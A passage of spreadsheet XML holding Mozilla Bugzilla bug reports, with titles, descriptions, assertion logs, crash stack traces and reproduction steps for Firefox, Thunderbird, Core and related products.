###!!! ASSERTION: nsPromptService not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/embedding/components/windowwatcher/src/nsPromptService.cpp line 94
###!!! ASSERTION: nsWindowWatcher not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/embedding/components/windowwatcher/src/nsWindowWatcher.cpp line 325
###!!! ASSERTION: nsWindowWatcher not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/embedding/components/windowwatcher/src/nsWindowWatcher.cpp line 326
###!!! ASSERTION: trying to forget from non-main thread: 'NS_IsMainThread()' file /Users/jruderman/central/xpcom/base/nsCycleCollector.cpp line 2166
###!!! ASSERTION: trying to suspect from non-main thread: 'NS_IsMainThread()' file /Users/jruderman/central/xpcom/base/nsCycleCollector.cpp line 2127
###!!! ASSERTION: wrong thread: 'NS_IsMainThread()' file /Users/jruderman/central/netwerk/base/src/nsIOService.cpp line 477</t>
  </si>
  <si>
    <t>FIREFOX-302050</t>
  </si>
  <si>
    <t>Want realtime spell checking mechanism.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
We are close to having the editor used in form  tags having real time
spell checking.  This work has been done for Thunderbird in
https://bugzilla.mozilla.org/show_bug.cgi?id=58612 so it should be pretty easy
for someone acomplished in Mozilla hacking to get this going for Firefox too.
Reproducible: Always
Steps to Reproduce:
Expected Results:  
When a  is displayed in a web page spell check the words as the user
types them.  Perhaps tie this to an attribute on the  at first (an
extension can optionally turn on this attribute for all .</t>
  </si>
  <si>
    <t>gmatta</t>
  </si>
  <si>
    <t>THUNDERBIRD-411481</t>
  </si>
  <si>
    <t>Make it easier for extensions to overlay the TB menubar by adding IDs</t>
  </si>
  <si>
    <t>The Thunderbird menubar is currently very hard to extend for extensions in some places because its items lack IDs in some places. In consequence it is very hard to add items to the menubar or hide items from TB and one has to hack around this issue. 
See http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/calendar/base/content/today-pane.js&amp;rev=1.11&amp;mark=93-112#92 for an example of such a hack.
As of today (revision 1.230 of mailWindowOverlay.xul on trunk) the following items miss an ID:
Lines 1163 1174 1186 1196 1214 1228 1231 1236 1251 1256 1261 1268 1273 1315 1328 1365 1368 1381 1400 1402 1441 1449 1455 1533 1566 1587 1646 1654 1675 1715 1716 1730 1737 1751 1789 1798 1844
Line 1855
Lines 1461 1828 1830
Lines 1176 1194 1225 1248 1258 1270 1321 1335 1350 1395 1411 1444 1462 1464 1476 1520 1537 1564 1584 1625 1652 1672 1722
Lines 1181 1195 1229 1230 1232 1233 1259 1450 1521 1522 1565 1585 1653 1673 1746
There are also  and  items without an ID and   and  items within these  and  items which do not contain an idea. But since I really do not understand this RDF stuff I left these out of the numbers above.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-511869</t>
  </si>
  <si>
    <t>Make Collections link sticky</t>
  </si>
  <si>
    <t>Per discussion we're looking at ways of making navigating back to the recommended collections a little easier for the user. This change is out of scope for the pilot but it'd be great to consider and implement if possible.
The link to the collections page will only appear in the first run which is visible only on profile generation/first time the browser is run. For users who navigate away from this page there is no easy way back to the information about the recommended collection.
Per discussions with neilio we wanted to see if there was a way to make the information a little more sticky through the use of a couple modifications of the browser. The modifications would be as follows:
- Add a bookmark to the bookmark toolbar that links to Recommended Addons. This bookmark would always be in the last position of any existing bookmarks (i.e. index n+1) and would not be included in the limit of 3 custom bookmark toolbar entries
- Add an html infobar (i.e. something in the first run page that creates an infobar similar to the about:rights dialog) to the firstrun page which would call attention to the bookmark and provide information to the user on how they can navigate back to the collection using that bookmark (as well as links to information about add-ons and collections)
- Modify the text of the Collections section of the first-run page to also call attention to the bookmark
Again this is an RFE for consideration. If it's OOS we'll add it as a post pilot sprint.
Thanks
k</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-389232</t>
  </si>
  <si>
    <t>Firefox build fails on OpenSolaris with enable-libxul</t>
  </si>
  <si>
    <t>FIREFOX-494210</t>
  </si>
  <si>
    <t>dialog.width entity should not be shared between the two sanitize dialogs</t>
  </si>
  <si>
    <t>browser/components/preferences/sanitize.xul (a dialog involved with the privacy prefpane) and browser/base/content/sanitize.xul (the clear recent history dialog) take their widths from the same dialog.width entity (in browser/locales/en-US/chrome/browser/sanitize.dtd) but with bug 480169 landed the two dialogs are now quite different.  A good width for one can be a bad width for the other see bug 490655 comment 19 and bug 493485.  Localizers should be able to specify independent widths for the two.</t>
  </si>
  <si>
    <t>splewako</t>
  </si>
  <si>
    <t>CORE-437607</t>
  </si>
  <si>
    <t>Clicking the Skip to main content link once works second time fails to initiate a V cursor jump</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Open above URL.
2. Using JAWS arrow to the Skip to main content link and press ENTER.
Result: Focus jumps to the About Mozilla heading.
3. Arrow around the page then back to the Skip to main content link and press ENTER again.
Expected: Focus again jumps to the heading.
Actual: Nothing happens.
4. Focus one of the other links and press NUM PAD STAR to open its context menu. This will cause a focus jump to that link.
5. Press ESCAPE to close the menu.
6. Arrow back to Skip to main content and press ENTER.
Expected: Focus would jump to the heading.
Actual: Nothing happens.
Rob Gallo of Freedom Scientific says: If you jump to a same page anchor a second time in a row Firefox doesn't fire the EVENT_SCROLLINGSTART event the 2nd time (that's the event we use to indicate
a same page jump).</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-139239</t>
  </si>
  <si>
    <t>DOM Inspector crashes when closing window [@ 0x00000000 - nsBoxObject::GetFrame]</t>
  </si>
  <si>
    <t>Linux build 20020421 (trunk)
DOM Inspector crashes when closing the window under certain circumstances
1. Open DOM Inspector.
2. File-&gt;Inspect a Window (browser window)
3. File-&gt;Inspect a URL (www.mozilla.org)
4. No repsonse to #4 (because I'm downloading something in the background).
5. Close DOM Inspector (before DOM Inspector pulls up the URL) =&gt; Crash
this started happening somewhere between 20020417 and 20020420 and only occurs
on trunk builds.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-153201</t>
  </si>
  <si>
    <t>amutat-eshnav.org.il: page loads blank</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.1a) Gecko/20020616
BuildID:    2002061603
This is a web site for a group that attempts to promote better use of the
internet. The Amutat Eshnav web site loads blank in mozilla but not in IE (
http://www.amutat-eshnav.org.il ). Looking at the code of the main page I see
this frame set:
    &lt;frame name=site src=../@HOME/scripts/frame.asp?sp_c=383018273
marginwidth=0 marginheight=0 scrolling=no frameborder=0&gt;
something there is really strange..
Reproducible: Always
Steps to Reproduce:
1. go to above url
2.notice the page
3.compare with ie/win
Actual Results:  page loads blank
Expected Results:  should show content</t>
  </si>
  <si>
    <t>xslf</t>
  </si>
  <si>
    <t>CORE-619109</t>
  </si>
  <si>
    <t>Make document.write() insert into the right place when invoked from script@onload or from a script-inserted inline script when a parser-inserted script is on the call stack</t>
  </si>
  <si>
    <t>Spun off of bug 592656:
document.write() insertion point tracking uses the current script from
nsScriptLoader. It should instead use the current parser-inserted script which
should get unset only after onload for the script has fired.
Attachment 486875 has a fix.</t>
  </si>
  <si>
    <t>BUGZILLA-472047</t>
  </si>
  <si>
    <t>Search containing %Complete boolean chart fails</t>
  </si>
  <si>
    <t>A search that uses %Complete in boolean chart fails to complete with error Can't use string (bugs.bug_id) as an ARRAY ref while strict refs in use at Bugzilla/Util.pm line 295. My guess is that this is a regression from changes done in bug 399371.
Calling Carp::Confess on DIE displays following call stack:
 at Bugzilla/Util.pm line 295
	Bugzilla::Util::lsearch('bugs.bug_id' 'bugs.bug_severity' 'bugs.priority' 'bugs.bug_status' 'bugs.resolution' 'map_products.name' 'bugs.remaining_time' '(SUM(ldtime.work_time)*COUNT(DISTINCT ldtime.bug_when)/COUNT(...' 'map_assigned_to.login_name' ...) called at Bugzilla/Search.pm line 1461
	Bugzilla::Search::_percentage_complete('Bugzilla::Search=HASH(0x93f2a30)' 'sequence' 'SCALAR(0x8f7cb50)' 'ff' 'SCALAR(0x8f7cb8c)' 'wherepart' 'ARRAY(0x8f62108)' 'supptables' 'ARRAY(0x8f620f0)' ...) called at Bugzilla/Search.pm line 721
	Bugzilla::Search::init('Bugzilla::Search=HASH(0x93f2a30)') called at Bugzilla/Search.pm line 74
	Bugzilla::Search::new('Bugzilla::Search' 'fields' 'ARRAY(0x91d8a60)' 'params' 'Bugzilla::CGI=HASH(0x8170954)' 'order' 'ARRAY(0x91d903c)') called at buglist.cgi line 991</t>
  </si>
  <si>
    <t>DIRECTORY-5259</t>
  </si>
  <si>
    <t>conn-&gt;newEntry method generates warning</t>
  </si>
  <si>
    <t>After upgrade perldap to 1.2.2 version I get the following warning every time
the conn-&gt;newEntry method is used.
Reference found where even-sized list expected at
/usr/local/lib/perl5/site_perl/5.005/sun4-solaris/Mozilla/LDAP/Conn.pm line 138.
In the script the call is:
  $entry = $conn-&gt;newEntry()</t>
  </si>
  <si>
    <t>si</t>
  </si>
  <si>
    <t>SEAMONKEY-237275</t>
  </si>
  <si>
    <t>Comb wrapping for README and license shouldn't have newlines</t>
  </si>
  <si>
    <t>The new installer stages which show the README and MPL show comb wrapping (every
other line is only a few characters long) using the default Debian fonts (this
will also be true for anyone who uses large fonts for accessibility reasons). 
The textarea isn't wide enough to show the lines at their actual length.  
This is cosmetic only but gives a bad impression of mozilla since it's the
first thing the user sees.
The easy fix: remove the newlines within paragraphs in the installer's copy of
these documents and let the textarea word-wrap the lines according to the
actual font in use.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-444417</t>
  </si>
  <si>
    <t>IMAP undo of delete appears to work but doesn't</t>
  </si>
  <si>
    <t>STR:
1) In an IMAP folder delete a message
2) Enter Undo (deleted message reappears in view)
3) Select a different folder then return to the original folder.
Actual behavior: deleted message no longer appears
Expected behavior: message appears.
This is a regression between 2008-06-13 and 2008-06-14. Probable cause: bug 435153</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-261606</t>
  </si>
  <si>
    <t>chatzilla fails to recognize encoded irc url if encoding uses capital letters</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20040911 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Win98 rv:1.7.3) Gecko/20040911 Firefox/0.10
Unsafe characters must be encoded in urls according to
http://www.faqs.org/rfcs/rfc1738.html (referenced in
http://www.w3.org/Addressing/draft-mirashi-url-irc-01.txt )
A url with capital letters will fail but one with lowercase letters will succeed.
e.g.
fails - irc://moznet/%5Btest%5D
succeeds - irc://moznet/%5btest%5d
using 	Chatzilla 0.9.64g [Mozilla rv:1.7.3/20040911]
Reproducible: Always
Steps to Reproduce:
1. Click a url with uppercase characters used to encode unsafe characters
specifically irc://moznet/%5Btest%5D
Actual Results:  
chatzilla opens a window.
In the Title area in the middle of the new window some characters are
displayed as boxes. i will represent them with the word BOX including quotes.
#boxBtestboxD
[INFO]	Channel view for â€œ#[\0x05]Btest[\0x05]Dâ€ opened.
--&gt;|	YOU have joined #[\0x05]BTEST[\0x05]D
(note the backslashes and brackets do not copy and paste so I typed them in).
Expected Results:  
#[test]
[INFO]	Channel view for â€œ#[test]â€ opened.
--&gt;|	YOU have joined #[test]</t>
  </si>
  <si>
    <t>brewthatistrue</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-141367</t>
  </si>
  <si>
    <t>remove files containing unused find code from PPEmbed</t>
  </si>
  <si>
    <t>I was working on bug 126312 (remove old find code) when I hit a snag: it seems
the embedding/powerplant code uses the old text services find code explicitly
rather than going through the frozen interface nsIWebBrowserFind.
Is this part of the embedded app still active?  Is there any reason it needs to
do the logic itself rather than just calling nsIWebBrowserFind?  I'm not sure
what all the code in CFindComponent::SetupDocForSearch is doing -- it's
different from
anything the other find implementations do.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-512678</t>
  </si>
  <si>
    <t>crash [@ nsPurpleBuffer::Put(nsISupports*)] during address autocomplete</t>
  </si>
  <si>
    <t>topcrash for seamonkey 2.0b2pre[1] (but not for thunderbird)
SM crash bp-9d762af1-2328-4123-9770-f96302090807 Typing an address into the to field in an email
nsPurpleBuffer::Put	 xpcom/base/nsCycleCollector.cpp:767
NS_CycleCollectorSuspect2_P	xpcom/base/nsCycleCollector.cpp:2985
nsCycleCollectingAutoRefCnt::decr	objdir/mozilla/dist/include/xpcom/nsISupportsImpl.h:197
nsGenericDOMDataNode::Release	content/base/src/nsGenericElement.cpp:4124
nsRefPtr::assign_assuming_AddRef	objdir/mozilla/dist/include/xpcom/nsAutoPtr.h:944
nsCOMPtr_base::assign_with_AddRef	objdir/mozilla/xpcom/build/nsCOMPtr.cpp:89
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:197
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:193
nsEventTargetChainItem::Destroy	content/events/src/nsEventDispatcher.cpp:76
nsEventDispatcher::Dispatch	content/events/src/nsEventDispatcher.cpp:524
nsXULPopupShownEvent::Run	layout/xul/base/src/nsMenuPopupFrame.cpp:300
nsThread::ProcessNextEvent	xpcom/threads/nsThread.cpp:510
NS_ProcessNextEvent_P	objdir/mozilla/xpcom/build/nsThreadUtils.cpp:227
nsBaseAppShell::Run	widget/src/xpwidgets/nsBaseAppShell.cpp:170
nsAppStartup::Run	toolkit/components/startup/src/nsAppStartup.cpp:193
XRE_main	toolkit/xre/nsAppRunner.cpp:3321 
TB 3.0b3 crash bp-27c7f80b-6f7a-44b5-a50a-298f42090815
similar stack
[1] seamonkey might be just one or two people inflating crash-stats
http://crash-stats.mozilla.com/report/list?product=SeaMonkey&amp;version=SeaMonkey%3A2.0b2pre&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=4&amp;range_unit=weeks&amp;do_query=1&amp;signature=nsPurpleBuffer%3A%3APut%28nsISupports*%29</t>
  </si>
  <si>
    <t>CORE-163645</t>
  </si>
  <si>
    <t>User defined properties of Javascript  navigator object are not remembered when a new page is loaded.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.1a) Gecko/20020611
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.1b) Gecko/20020818
I am trying to create user defined properties in the navigator object such as
 navigator.id = 1122334455. This property should be retained when I load a new
page and should be accessible from it. Trying to access the property from the
newly loaded page returns undefined. 
This works on 1.1a on Windows but not on 1.1b and the nightly of August18 2002.
Testing on Warpzilla (Mozilla for OS/2) looks like this...
1.1b - fails
1.1a - works 
1.0 - works
rc3 - works
rc2 - fails
rc1 - fails
This behavior works correctly on IE also.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>aniapte</t>
  </si>
  <si>
    <t>CALENDAR-326335</t>
  </si>
  <si>
    <t>New calendar not displayed in Lightning calendar tab after creation</t>
  </si>
  <si>
    <t>Faultily/confusing behavior of calendar tab in Lightning.
1. Start Thunderbird with clean profile and install Lightning.
2. Go to the calendar tab. 'Home' calendar is displayed.
3. Create a new calendar named 'test'.
   --&gt; Error: The new calendar is created but is not shown in calendar tab. 
              Switching to other tabs or applications does not help.
(This worked in former versions on lightning.)
4. Double click on the space in calendar tab where the new calendar should be displayed.
   --&gt; Confusing: The calendar properties for 'test' is shown although it
       seemed that we clicked into empty space.
5. Select 'Home' calendar and press 'Delete' button
   --&gt; The 'Home' calendar is deleted from calendar tab. 
       The 'test' calendar is now displayed in place of the 'Home' calendar.
5. Select 'test' calendar and press 'Delete' button
   --&gt; The 'test' calendar is deleted from calendar tab. Error: 'Home 
       calendar is shown again? (This might be intended but is very confusing)
Expected results:
After calendar creation the new calendar is displayed in calendar tab.
(Not sure about the resurrected 'Home' calendar issue)
Tested on windows with Thunderbird 1.5 (20051201) and Lightning build from 2006-02-07.</t>
  </si>
  <si>
    <t>stephan.schaefer</t>
  </si>
  <si>
    <t>MOZILLA.ORG-384482</t>
  </si>
  <si>
    <t xml:space="preserve">webtree CVS account for David Boswell </t>
  </si>
  <si>
    <t>David Boswell is starting work for the Mozilla Foundation on June 18 and one of the things I'd like him to do is to help out with Foundation-related content on www.mozilla.org. According to David he doesn't have an active CVS account for www.mozilla.org so I'd like one to be created for him if possible. You can use david@mozilla.org as the associated address.
P.S. If you need him to sign paperwork he can do it when he's out in Mountain View June 18-20.</t>
  </si>
  <si>
    <t>CORE-423233</t>
  </si>
  <si>
    <t>cycle collect libeditor</t>
  </si>
  <si>
    <t>Editor holds references to input elements as soon as you open the browser.</t>
  </si>
  <si>
    <t>CORE-43684</t>
  </si>
  <si>
    <t>nsTimerGTK changes causing performance degradation</t>
  </si>
  <si>
    <t>Your changes to nsTimerGTK.cpp (1.13) and nsTimerGTK.h (1.4) caused the
performance of the MNG image decoder to drop by a factor of roughly ten.
The decoder adds timers for animations using ImgDCBSetTimeout().</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-499446</t>
  </si>
  <si>
    <t>Bug 497680 cause reported memory leaks in xpcshell-tests (bayesian-spam-filter and test_bug366491.js)</t>
  </si>
  <si>
    <t>The landing of bug 497680 caused reported leaks in all the extensions/bayesian-spam-filter tests and test_bug366491.js (mailnews/base/test/unit).
This is possibly similar to our other rdf resource leak bugs e.g. bug 498323 or bug 498321) however reporting it here as it is a fresh reported leak.</t>
  </si>
  <si>
    <t>CORE-159583</t>
  </si>
  <si>
    <t>simple string bundle optimization</t>
  </si>
  <si>
    <t>a while back dbaron pointed out that the string bundle code spends a lot of
time inside the nsCAutoString constructor.  so i took a closer look at the code
and noticed that there are at least two nsCAutoString instances that can be
eliminated.  i'm not sure how much of performance win this is if at all but
anyways here's the patch.</t>
  </si>
  <si>
    <t>FIREFOX-252273</t>
  </si>
  <si>
    <t>last next button before install starts should be labeled install or similar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040707 Firefox/0.8
The last button (now labeled Next) before the installer starts installing
Firefox should be labeled Install instead.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-296374</t>
  </si>
  <si>
    <t>move evalInSandbox to Components.utils.evalInSandbox</t>
  </si>
  <si>
    <t>The evalInSandbox code may well be useful to chrome code as well and the
global-namespace pollution of the current name never really appealed to me.  And
having Components.util will make it easier to add other handy utilities like
Factory or Module whee.</t>
  </si>
  <si>
    <t>NSPR-210138</t>
  </si>
  <si>
    <t>thread problem and initialisation problem</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.74 [en] (X11 U NetBSD 1.6T i386)
Build Identifier: CVS of Jun 19 2003 16:14GMT  (1.5a)
I'm trying to compile and run firebird from cvs on NetBSD-1.6T/i386 which does
come with a native libpthread. Compilation is apparently successful.
With no .mozilla nor .phoenix directory I just run MozillaFirebird and either
get
Reproducible: Always
Steps to Reproduce:
1.Fresh build and install.
2.MozillaFirebird
3.
Actual Results:  
Either:
[1]   Segmentation fault (core dumped) ${prog} ${1+$...
#0  0x482b2c15 in _PR_CPU_Idle (_cpu=0x806a000) at prucpu.c:383
383                     _PR_MD_SWITCH_CONTEXT(me)
(gdb) bt
#0  0x482b2c15 in _PR_CPU_Idle (_cpu=0x806a000) at prucpu.c:383
#1  0x482b4dbc in _PR_UserRunThread () at pruthr.c:523
Current language:  auto currently c
or: (I actually ran MozillaFirebird as root before this which is why xpti.dat
is already there..)
Type Manifest File: /usr/local/lib/mozilla-1.5a/components/xpti.dat
nsNativeComponentLoader: autoregistering begins.
nsNativeComponentLoader: autoregistering succeeded
nNCL: registering deferred (0)
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsChromeRegistry.cpp
line 3190
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file nsChromeRegistry.cpp
line 3190
GFX: dpi=75 t2p=0.0526316 p2t=19 depth=24
WEBSHELL+ = 1
LoadPlugin() /usr/local/lib/mozilla-1.5a/plugins/libnullplugin.so returned
81fe940
GetMIMEDescription() returned *:.*:All types
###!!! ASSERTION: Error occured reading image preferences: 'NS_SUCCEEDED(rv)'
file nsImgManager.cpp line 116
Break: at file nsImgManager.cpp line 116
WEBSHELL+ = 2
Expected Results:  
Hopefully not given me any errors.
By Reproducibilty = Every time I mean every time I either get the thread
core dump or the image preferences assert.
I can go into .phoenix...chrome and
cp userChrome-example.css userChrome.css
cp userContent-example.css userContent.css
and that doesn't change the outcome.
I have the core dump - just let me know if you need further info!</t>
  </si>
  <si>
    <t>FIREFOX-192801</t>
  </si>
  <si>
    <t>A new tab opens if I select a web page from the url bar history.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20030128 Phoenix/0.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20030128 Phoenix/0.5
In the toolbar where I type the URL there is the ability to go to web pages
you went to previously. When I go there it opens a new tab.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>FIREFOX-269700</t>
  </si>
  <si>
    <t>'Text only' drop down menus are missing for 'Back' and 'Forward' on the trunk.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5) Gecko/20041112 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5) Gecko/20041112 Firefox/0.9.1+
In toolbar customization select 'Text only'. Now you no longer see the small
arrows right aside the 'Back' and 'Forward' button. They only appear in 'Icon'
and 'Text and Icon' mode.
Reproducible: Always
Steps to Reproduce:
1. View - Toolbars - Customize
2. Select: Show: Text
Actual Results:  
Drop down arrows disappear.
Expected Results:  
Drop down arrows should stay as before.</t>
  </si>
  <si>
    <t>thomas.ts.schade</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-345264</t>
  </si>
  <si>
    <t>FeedProcessor should set this._result to null after sending the result to the listener</t>
  </si>
  <si>
    <t>...the idea being that once this is done responsibility for managing and releasing the result lies entirely with the listener (which currently doesn't actually release the result but that's bug 344651).</t>
  </si>
  <si>
    <t>CORE-291285</t>
  </si>
  <si>
    <t xml:space="preserve"> with no width/height crashes</t>
  </si>
  <si>
    <t>A  element with no width/height attributes crashes. It should default to
300x200 I believe.
TESTCASE:
http://www.hixie.ch/tests/adhoc/html/canvas/002.html</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-149488</t>
  </si>
  <si>
    <t>[PATCH] for nsCocoaBrowserService.cpp</t>
  </si>
  <si>
    <t>Hi.
Bug #148432 has a patch for Chimera which lets it correctly
read path components with non-ascii characters.  It looks like
mozilla/embedding/browser/cocoa/src/nsCocoaBrowserService.cpp has
the same bug.  I'll submit a patch in just a sec.</t>
  </si>
  <si>
    <t>david.haas</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-220702</t>
  </si>
  <si>
    <t>The Update From and Update Since functions don't work on this page.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20030925
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20030925
When I access the PDA Watchster page I can specify days or dates in the From
or Since fields and use the Update button to update the page based on the
specified dates.  When I press Update nothing happens.
Reproducible: Always
Steps to Reproduce:
1.Go to http://pda.watchster.com/
2.Specify a Since value of Yesterday
3.Click Update
Actual Results:  
Nothing happens.
Expected Results:  
The page should update to reflect yesterday's news or the news corresponding to
ANY criteria specified via the From or Since fields.
The page functions properly in IE 6 and Opera 7.20 on Windows 2000.</t>
  </si>
  <si>
    <t>FIREFOX-440744</t>
  </si>
  <si>
    <t>on local page external links external images videoclips javascript don't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 it rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 it rv:1.9) Gecko/2008052906 Firefox/3.0
just installed version 3.
Never experimented this before using version 2 and version 3 beta.
testing locally my web pages external links external images videoclips javascript don't work just local links work.
pages work fine offline using Internet explorer.
Putting pages online are working correctly
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>astalalista</t>
  </si>
  <si>
    <t>BUGZILLA-455558</t>
  </si>
  <si>
    <t>Custom free text fields too long (particularly in Dusk)</t>
  </si>
  <si>
    <t>Free text fields leak off the side of the page because they're longer than the right column in Dusk. They're also longer than free text fields in the left column which is kind of silly.</t>
  </si>
  <si>
    <t>CORE-282177</t>
  </si>
  <si>
    <t>resync xpfe bindings with toolkit widgets</t>
  </si>
  <si>
    <t>As part of the seamonkey-on-xulrunner work we need to resync xpfe's bindings
with toolkit's widgets.  Added benefits to both sides will be picking up fixes
that have occured on one side of the fork or the other.  Right now 13 are still
synced not counting a couple with whitespace-only differences and 15 have
differences to be merged.
As part of the process we can use relative paths in the xpfe jar.mn to pick up
the toolkit versions of synced files and cvs remove the xpfe versions.  The
xpfe files will always be there in the attic if we need them for cvs blame etc.
There's some issues to be resolved on the non-code level wrt code review as
well but that's something that needs some discussion with xpfe and toolkit owners.
The following files are already in sync and we can start with them once the
non-code issues are resolved appropriately:
checkbox.xml colorpicker.xml editor.xml groupbox.xml menulist.xml
nativescrollbar.xml popup.xml progressmeter.xml scrollbar.xml scrollbox.xml
spinbuttons.xml splitter.xml stringbundle.xml</t>
  </si>
  <si>
    <t>FIREFOX-399398</t>
  </si>
  <si>
    <t>Icon Inventory for the Firefox 3 Visual Refresh</t>
  </si>
  <si>
    <t>This is a tracking bug for the icon inventory for the Firefox 3 visual refresh.  The inventory is currently located here: http://people.mozilla.com/~faaborg/files/granParadisoUI/icons/iconInventory.html</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-522307</t>
  </si>
  <si>
    <t>Add a hint under Header and Footer fields for image uploads</t>
  </si>
  <si>
    <t>It would make the life of first-time Personas creators so much easier if there was a little hint displayed under the Header and Footer fields for image uploads in STEP 2: Create your Persona explaining the required properties of the image for it to be properly uploaded.
Right now the only way to know that the file size needs to be under 300KB is by uploading a an image file that is too big. when you do that you get a red error message. 
Same thing goes for image dimensions. It is only AFTER you upload the image that you see that your image needs to be a certain width and a certain height.
Wouldn't it be simpler just to specify at the outset the specific conditions an image has to meet before trying to upload it and losing so much time? Also you would make life much easier for Personas newbies if this info was specified in the FAQ.
THANKS!!!</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-397940</t>
  </si>
  <si>
    <t>Version/config bumps for TB2.0.0.9 release</t>
  </si>
  <si>
    <t>Currently the Tbird Builds have the Version String Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8.1.8pre) Gecko/20070925 Thunderbird/2.0.0.7pre Mnenhy/0.7.5.666 ID:2007092703
I think this should now be 2.0.0.8pre like we do for Firefox.</t>
  </si>
  <si>
    <t>FIREFOX-351260</t>
  </si>
  <si>
    <t>No provision for disabling welcome and override pages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Build Identifier: 
The 2.0 branch doesn't allow the administrator to prevent the welcome and
override pages from being shown (the 1.5 branch did though it may have been an
unintentional feature).  Disabling these pages is desirable when using Firefox
on a intranet without direct internet access.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-335813</t>
  </si>
  <si>
    <t>Spell checker doesn't recommend some obvious corrections</t>
  </si>
